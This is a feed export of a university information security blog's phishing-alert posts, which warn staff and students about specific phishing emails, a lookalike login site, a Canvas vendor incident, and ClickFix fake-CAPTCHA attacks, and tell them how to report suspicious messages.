Phish Alert Archives - Information Security /uit/infosec/category/phish-alert/ Fri, 08 May 2026 23:20:06 +0000 en-CA hourly 1 https://wordpress.org/?v=6.9.4 Canvas by Instructure: Important Notice /uit/infosec/2026/05/08/canvas-by-instructure-important-notice/ Fri, 08 May 2026 23:20:03 +0000 /uit/infosec/?p=2711 Instructure, the company that operates Canvas (the learning management system used at Schulich to manage coursework, assignments, grades, and course communications), has reported a cybersecurity incident that appears to have affected Canvas at thousands of educational institutions worldwide. Canvas remains available and University teaching and learning activities can continue as usual. We will share any changes if Instructure鈥檚 […]

The post Canvas by Instructure: Important Notice appeared first on Information Security.

]]>
Instructure, the company that operates Canvas (the learning management system used at Schulich to manage coursework, assignments, grades, and course communications), has reported a cybersecurity incident that appears to have affected Canvas at thousands of educational institutions worldwide.

Canvas remains available and University teaching and learning activities can continue as usual. We will share any changes if Instructure鈥檚 guidance or system status changes.

No action is required at this time, other than remaining alert for phishing or other suspicious messages.

Instructure has posted the following .

91亚色/Schulich is prioritizing assessing this incident and will update this message and share relevant updates and guidance through our usual communications channels as information becomes available.

Canvas is an externally-hosted platform. 91亚色 and Schulich School of Business systems were not affected.

The University is monitoring the incident response and will provide additional information and guidance as more details become available.

91亚色 is committed to protecting privacy and maintaining the trust of our students and community. We are working with Instructure to understand how this happened and what actions Instructure are taking to prevent future incidents.

We encourage all students, faculty, and staff to remain vigilant:

Questions: For questions about this notice or Canvas use at Schulich, please contact canvasincident@schulich.yorku.ca

Beware of Phishing: Cybercriminals often use stolen contact information to send convincing 鈥減hishing鈥 emails. Be wary of any message, even those appearing to come from Schulich, 91亚色, or Canvas that asks you to click a link, provide a password, or share personal details. A reminder: 91亚色 will never ask for your password by email, text, or phone.

Verify Communications: If you receive a suspicious message regarding this incident, do not click any links. Report it directly to infosec@yorku.ca.

The post Canvas by Instructure: Important Notice appeared first on Information Security.

]]>
Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks /uit/infosec/2026/04/22/fake-captcha-real-threat-clickfix-social-engineering-attacks/ Wed, 22 Apr 2026 19:36:36 +0000 /uit/infosec/?p=2678 ClickFix attacks are a rapidly evolving threat that use fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That鈥檚 why […]

The post Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks appeared first on Information Security.

]]>
ClickFix attacks are a rapidly evolving threat that use fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That鈥檚 why ClickFix pushes you to take extra steps yourself. By convincing you to run a command, the attacker gets past the protections already set in place and installs malware that would otherwise be detected.

What is ClickFix?

ClickFix is a social engineering technique where attackers compromise legitimate websites and replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands often involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to 鈥渇ix鈥 a problem or 鈥渧erify鈥 the user. In reality, the script is being used to download malware that compromises your device.

This technique has been observed across higher鈥慹ducation institutions and is increasingly used to deploy malware families such as , a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How does it Work?

ClickFix attacks follow a simple pattern:

  1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop鈥憉p appears unexpectedly.
  2. Instead of asking you to click images or check a box, it tells you there鈥檚 a 鈥減roblem鈥 and you need to run a command to continue.
  3. The page instructs you to open Windows + R, PowerShell, or Terminal and paste in a line of text.
  4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.

How Can I Spot a ClickFix Attempt?

Exercise caution towards any unfamiliar website, email, or popup that:

  • Asks you to open Windows Run (Windows + R)
  • Tells you to paste a command into PowerShell or Terminal
  • Claims you must run a script to 鈥渇ix,鈥 鈥渧erify,鈥 or 鈥渃ontinue鈥
  • Appears immediately after clicking a search result or ad
  • Displays a CAPTCHA that looks unusual, low鈥憅uality, or out of place

If you encounter instructions like:

鈥淧ress Windows + R and paste the following command鈥︹

鈥t is almost certainly malicious.

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).

References:

  • https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  • https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/

The post Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks appeared first on Information Security.

]]>
Phish Alert - Malicious Website Impersonating 91亚色 /uit/infosec/2026/03/17/phish-alert-malicious-website-impersonating-york-university/ Tue, 17 Mar 2026 14:19:21 +0000 /uit/infosec/?p=2647 The Information Security team has identified a fraudulent website impersonating 91亚色 that is actively attempting to harvest community members' login credentials. This malicious site closely mimics the appearance of official 91亚色 web properties and may be encountered when users attempt to access University services through search engines. The impersonation site is NOT affiliated […]

The post Phish Alert - Malicious Website Impersonating 91亚色 appeared first on Information Security.

]]>
The Information Security team has identified a fraudulent website impersonating 91亚色 that is actively attempting to harvest community members' login credentials. This malicious site closely mimics the appearance of official 91亚色 web properties and may be encountered when users attempt to access University services through search engines.

The impersonation site is NOT affiliated with 91亚色 and should be considered malicious. Do NOT enter your username, credentials, Duo 2FA codes, or any other personal information on this site as this may result in unauthorized access to your accounts.

The fraudulent site uses the URL <www.yorkuonline.com>, an image is shown below for reference:

Red Flags to Watch Out For

Unsolicited messages directing you to log in:
Messages claiming your account will be disabled, your mailbox is full, or your access is expiring are common tactics used to lure users to fake login pages.

Suspicious URL:
Official 91亚色 login pages always use domains ending in yorku.ca. Any variation such as extra characters, misspellings, unfamiliar subdomains should be treated as suspicious.

Unexpected login prompts:
If you are asked to 鈥渧erify your account鈥, 鈥渦pdate your credentials鈥 or 鈥渞estore access鈥 after clicking a link you did not expect, this is a strong indicator of a phishing attempt.

Requests for Duo/MFA passcodes:
91亚色 will never ask you to enter Duo 2FA codes outside of the official login process. Any site requesting your passcode directly should be considered malicious.

If you encounter any emails or messages directing you to this site, please report it using the Report Phishing button or forward the message to phishing@yorku.ca.

If you have already entered your credentials into the malicious site, change your password immediately by visiting . If you have any questions or concerns, please contact infosec@yorku.ca.

The post Phish Alert - Malicious Website Impersonating 91亚色 appeared first on Information Security.

]]>
Phish Alert - Winter 2026 Term Commencement 鈥 Important Information /uit/infosec/2026/01/05/phish-alert-winter-2026-term-commencement-important-information/ Mon, 05 Jan 2026 16:02:29 +0000 /uit/infosec/?p=2527 The Information Security team has identified a targeted phishing email sent on January 5, 2026 (today) that is being circulated among the 91亚色 community. The email used the subject line equal or similar to "Winter 2026 Term Commencement 鈥 Important Information" and falsely advertises monetary compensation in the form of a "Student Engagement Bonus" […]

The post Phish Alert - Winter 2026 Term Commencement 鈥 Important Information appeared first on Information Security.

]]>
The Information Security team has identified a targeted phishing email sent on January 5, 2026 (today) that is being circulated among the 91亚色 community. The email used the subject line equal or similar to "Winter 2026 Term Commencement 鈥 Important Information" and falsely advertises monetary compensation in the form of a "Student Engagement Bonus" to recipients. Recipients are directed to submit their sensitive personal and financial information to an external address that is NOT affiliated with 91亚色 and is to be considered malicious.

Key details of the phishing email:

Subject: "Winter 2026 Term Commencement 鈥 Important Information"
Date: January 5, 2026
Sender: admin@gpaindustria.onmicrosoft.com

Red Flags to Watch Out For:

Suspicious sender email: The sender's email address is not associated with 91亚色鈥檚 official IT services (email was NOT sent from an @yorku.ca address).
Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond to this email or provide any personal information.
Do not click any links or open attachments that may be included.
Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

The post Phish Alert - Winter 2026 Term Commencement 鈥 Important Information appeared first on Information Security.

]]>
Phish Alert - Notification of Eligibility: Fall 2025 Bonus at 91亚色 /uit/infosec/2025/12/03/phish-alert-notification-of-eligibility-fall-2025-bonus-at-york-university/ Wed, 03 Dec 2025 18:50:44 +0000 /uit/infosec/?p=2510 The Information Security team has identified a targeted phishing email sent between December 2nd - 3rd, 2025听that is being circulated among the 91亚色 community. The email used the subject line equal or similar to听"Notification of Eligibility: Fall 2025 Bonus at 91亚色"听and falsely advertises a "Fall Bonus" to recipients. Recipients are directed to submit […]

The post Phish Alert - Notification of Eligibility: Fall 2025 Bonus at 91亚色 appeared first on Information Security.

]]>
The Information Security team has identified a targeted phishing email sent between December 2nd - 3rd, 2025听that is being circulated among the 91亚色 community. The email used the subject line equal or similar to听"Notification of Eligibility: Fall 2025 Bonus at 91亚色"听and falsely advertises a "Fall Bonus" to recipients. Recipients are directed to submit their sensitive personal and financial information to an external address that is听NOT听affiliated with 91亚色 and is to be considered malicious.


Key details of the phishing email:

Subject: "Notification of Eligibility: Fall 2025 Bonus at 91亚色"
Date:听December 2 - 3, 2025
厂别苍诲别谤:听admin@gpaindustria.onmicrosoft.com



Red Flags to Watch Out For:

Suspicious sender email: The sender's email address is not associated with 91亚色鈥檚 official IT services (email was NOT sent from an @yorku.ca address).
Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond to this email or provide any personal information.
Do not click any links or open attachments that may be included.
Report the email: If you received this phishing attempt, please report it using the  or forward it to phishing@yorku.ca

The post Phish Alert - Notification of Eligibility: Fall 2025 Bonus at 91亚色 appeared first on Information Security.

]]>
Phish Alert - Important: Your Eligibility for the Fall 2025 Bonus Payment / Notification of Eligibility: Fall 2025 Bonus at 91亚色 /uit/infosec/2025/11/17/phish-alert-important-your-eligibility-for-the-fall-2025-bonus-payment-notification-of-eligibility-fall-2025-bonus-at-york-university/ Mon, 17 Nov 2025 17:30:15 +0000 /uit/infosec/?p=2403 The Information Security team has identified a targeted phishing email sent on November 17th, 2025听that is being circulated among the 91亚色 community. The email used the subject line equal or similar to "Important: Your Eligibility for the Fall 2025 Bonus Payment" OR "Notification of Eligibility: Fall 2025 Bonus at 91亚色", and claims to […]

The post Phish Alert - Important: Your Eligibility for the Fall 2025 Bonus Payment / Notification of Eligibility: Fall 2025 Bonus at 91亚色 appeared first on Information Security.

]]>
The Information Security team has identified a targeted phishing email sent on November 17th, 2025听that is being circulated among the 91亚色 community. The email used the subject line equal or similar to "Important: Your Eligibility for the Fall 2025 Bonus Payment" OR "Notification of Eligibility: Fall 2025 Bonus at 91亚色", and claims to be sent from听91亚色 Office of the Registrar.

The phish prompts recipients to submit personal information to an external address that is NOT affiliated with 91亚色.

Key details of the phishing email:

Subject: "Important: Your Eligibility for the Fall 2025 Bonus Payment" OR "Notification of Eligibility: Fall 2025 Bonus at 91亚色"
Sent:听November 17th, 2025
厂别苍诲别谤:听admin@gpaindustria.onmicrosoft.com

The email falsely advertises a "Fall Bonus" to recipients and directs them to submit their personal information to an external address (registrar.yorku2025@aol.com). This external address is NOT affiliated with 91亚色's Registrar Office and is to be considered malicious.

Red Flags to Watch Out For:
Suspicious sender email:听The sender's email address is not associated with 91亚色鈥檚 official IT services (email was听NOT听sent from an @yorku.ca address).
Urgency and financial motivation:听The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details:听91亚色 would听NEVER听ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond听to this email or provide any personal information.
Do not click听any links or open attachments that may be included.
Report the email:听If you received this phishing attempt, please report it using the听听or forward it to听phishing@yorku.ca

The post Phish Alert - Important: Your Eligibility for the Fall 2025 Bonus Payment / Notification of Eligibility: Fall 2025 Bonus at 91亚色 appeared first on Information Security.

]]>
Phish Alert - 16.89 % Salary Increase Letter Wednesday, November 5, 2025 /uit/infosec/2025/11/05/phish-alert-16-89-salary-increase-letter-wednesday-november-5-2025/ Wed, 05 Nov 2025 15:30:39 +0000 /uit/infosec/?p=2384 The Information Security team has identified a targeted phishing email听being circulated among the 91亚色 community. The email, titled听"16.89 % Salary Increase Letter Wednesday, November 5, 2025", claims to be sent from听91亚色 Payroll & Employee Relations,听and prompts recipients to submit personal information. The email was sent from a compromised external account that is not […]

The post Phish Alert - 16.89 % Salary Increase Letter Wednesday, November 5, 2025 appeared first on Information Security.

]]>
The Information Security team has identified a targeted phishing email听being circulated among the 91亚色 community. The email, titled听"16.89 % Salary Increase Letter Wednesday, November 5, 2025", claims to be sent from听91亚色 Payroll & Employee Relations,and prompts recipients to submit personal information. The email was sent from a compromised external account that is not affiliated with 91亚色.

Key details of the phishing email:

  • Subject:听16.89 % Salary Increase Letter Wednesday, November 5, 2025
  • Sent:听November 5th, 2025
  • Sender: harry.ruda@utoronto.ca

The email falsely claims to provide salary increase information enclosed in an attached PDF file titled "91亚色 (1).pdf", which later directs users to submit their credentials and personal information into a malicious webpage.

Red Flags to Watch Out For:

  1. Suspicious sender email:听The sender's email address is not associated with 91亚色鈥檚 official IT services (email was听NOT听sent from an @yorku.ca address).
  2. Urgency and financial motivation:听The email pressures you to act quickly, using the false promise of disclosing details pertaining to a salary increase.
  3. Request for personal details:听91亚色 would听NEVER听ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:

  • Do not respond听to this email or provide any personal information.
  • Do not click听any links or open attachments that may be included.
  • Report the email:听If you received this phishing attempt, please report it using the听听or forward it to听phishing@yorku.ca

The post Phish Alert - 16.89 % Salary Increase Letter Wednesday, November 5, 2025 appeared first on Information Security.

]]>
Phish Alert - Beware of Sophisticated Phishing Campaign Targeting 1Password Users /uit/infosec/2025/10/17/phish-alert-beware-of-sophisticated-phishing-campaign-targeting-1password-users/ Fri, 17 Oct 2025 14:51:20 +0000 /uit/infosec/?p=2321 The Information Security team is aware of a new phishing campaign targeting 1Password users with convincing "fake breach" alerts. Users of both personal and enterprise 1Password accounts should exercise caution and steer clear of emails that falsely claim to be from 1Password. Cybercriminals are distributing emails with the subject line "馃敀Watchtower Alert: Password Issue Detected", […]

The post Phish Alert - Beware of Sophisticated Phishing Campaign Targeting 1Password Users appeared first on Information Security.

]]>
The Information Security team is aware of a new phishing campaign targeting 1Password users with convincing "fake breach" alerts. Users of both personal and enterprise 1Password accounts should exercise caution and steer clear of emails that falsely claim to be from 1Password.

Cybercriminals are distributing emails with the subject line "馃敀Watchtower Alert: Password Issue Detected", that appear to be legitimate breach notifications from 1Password. These messages claim that your account has been compromised and prompt you to click a link to 鈥渟ecure鈥 your vault. The link leads to a fake login page designed to steal your credentials.

If you receive the phishing email described above or any other similarly suspicious emails claiming to be from 1Password, please do听NOT听click on any links within the email and submit your credentials or respond to the scammer. You can report this activity to our team using the听听or by forwarding it to听phishing@yorku.ca.


Red Flags to watch out for:

  • Sender impersonation: The email may appear to come from 鈥watchtower@eightninety.com鈥 or similar addresses.
  • Urgent language: Subject lines like 鈥Watchtower Alert: Password Issue Detected鈥 are used to provoke panic.
  • Fake login page: Clicking the link directs users to a site mimicking 1Password鈥檚 interface, but hosted on a malicious domain.
  • Subtle visual cues: The phishing page uses accurate branding and design elements, making it difficult to distinguish from the real site.

馃敆 Additional Resources

The post Phish Alert - Beware of Sophisticated Phishing Campaign Targeting 1Password Users appeared first on Information Security.

]]>
Phish Alert - 91亚色u Account Verification Needed /uit/infosec/2025/10/03/phish-alert-yorku-account-verification-needed-2/ Fri, 03 Oct 2025 13:24:33 +0000 /uit/infosec/?p=2233 The Information Security team wants to bring to your immediate attention a phishing email that has been circulating, which appears to originate from a UoT email address. This email is designed to trick recipients into sharing sensitive personal information, including passwords and account details. Please read the information below carefully to protect yourself and our […]

The post Phish Alert - 91亚色u Account Verification Needed appeared first on Information Security.

]]>
The Information Security team wants to bring to your immediate attention a phishing email that has been circulating, which appears to originate from a UoT email address. This email is designed to trick recipients into sharing sensitive personal information, including passwords and account details. Please read the information below carefully to protect yourself and our community.

The email described above is听NOT听legitimate and was听NOT听sent by 91亚色.听If you clicked on the link and sent an email to utgsu.duo@aol.com, please change your password immediately.听If you have re-used the compromised password on any other accounts, please change the passwords for those accounts to something complex and unique to each account. Passport 91亚色 passwords can be changed at听, logging in, clicking on 鈥淧assport YORK鈥 on the left-hand menu and clicking the 鈥淐hange My Password鈥 button on the right.

Red Flags to Watch Out For:

  1. Suspicious sender email: The sender's email address is randomly generated and not associated with 91亚色鈥檚 official IT services.
  2. Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:

  • Do not respond to this email or provide any personal information.
  • Do not click any links or open attachments that may be included.
  • Report the email: If you received this phishing attempt, please report it using the  or forward it to phishing@yorku.ca

The post Phish Alert - 91亚色u Account Verification Needed appeared first on Information Security.

]]>
Phish Alert - "Financial Verification Notice" Scam Email /uit/infosec/2025/09/22/phish-alert-financial-verification-notice-scam-email/ Mon, 22 Sep 2025 20:25:40 +0000 /uit/infosec/?p=2159 The Information Security team is aware of a phishing scam targeting International Students that is being circulated among the 91亚色 community on September 22, 2025. The scam instructs students to provide sensitive information pertaining to their financial institution, passport, and tuition payment information. The scam uses the 91亚色 logo and is attempting to impersonate […]

The post Phish Alert - "Financial Verification Notice" Scam Email appeared first on Information Security.

]]>
The Information Security team is aware of a phishing scam targeting International Students that is being circulated among the 91亚色 community on September 22, 2025. The scam instructs students to provide sensitive information pertaining to their financial institution, passport, and tuition payment information. The scam uses the 91亚色 logo and is attempting to impersonate 91亚色 Vice-Provost Students to instill a false sense of legitimacy. This letter is NOT legitimate and was NOT sent by 91亚色.

The scam letter is shown below for reference:

If you receive the scam letter via email or any other communication medium, please do NOT respond to the scammer and report it using the  or forward it to phishing@yorku.ca.

Red Flags to Watch Out For:

  1. Suspicious sender email:听The sender's email address [i.e. example@mail.google.ca] is not associated with 91亚色鈥檚 official IT services.
  2. Urgency and fear tactics: The email pressures you to act immediately by threatening account deactivation.
  3. Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.
  4. Unsecure email address for responses:听The email may ask you to respond to a suspicious external email address (i.e. utgsu.duo@aol.com), which is听not听a legitimate 91亚色 domain.

If you have already responded to this scam, stop all communication with the scammer and notify infosec@yorku.ca; If you provided any account names or passwords, change any such passwords immediately.

The post Phish Alert - "Financial Verification Notice" Scam Email appeared first on Information Security.

]]>